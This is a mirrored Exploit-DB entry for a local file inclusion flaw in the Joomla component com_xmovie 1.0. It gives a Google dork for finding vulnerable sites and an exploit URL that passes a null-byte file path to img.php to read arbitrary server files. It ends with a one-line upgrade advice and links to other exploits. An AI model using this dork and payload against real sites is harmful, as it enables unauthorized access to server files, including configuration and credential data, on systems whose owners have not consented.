Joomla! Component com_xmovie 1.0 – Local File Inclusion

Exploit Database
13 阅读

作者： KelvinX

日期： 2010-12-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15819/

# Exploit Title: Joomla Component com_xmovie 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 24-2010
# Location: HCM City, Vietnam

------------------------

# Application: com_xmovie
# Version: 1.0
# Vendor: http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/15297
# Google Dorks: inurl:com_xmovie

------------------------

Exploit: http://www.site.com/components/com_xmovie/helpers/img.php?file=[LFI]%00

------------------------

# Solution: Upgrade to the most recent version

last Exploits
Joomla! Component com_xmovie 1.0 – Local File Inclusion的更多信息

RV Shopping Cart – Cross-Site Request Forgery：
REZERVI 3.0.2 – Remote Command Execution：
Hikvision Digital Video Recorder – Cross-Site Request Forgery：
NXFilter 3.0.3 – Cross-Site Request Forgery：
phpCow 2.1 – File Inclusion：
FreeNAS – ‘exec_raw.php’ Arbitrary Command Execution (Metasploit)：
Nagios Log Server 2.1.6 – Persistent Cross-Site Scripting：
Joomla! Component com_markt – SQL Injection：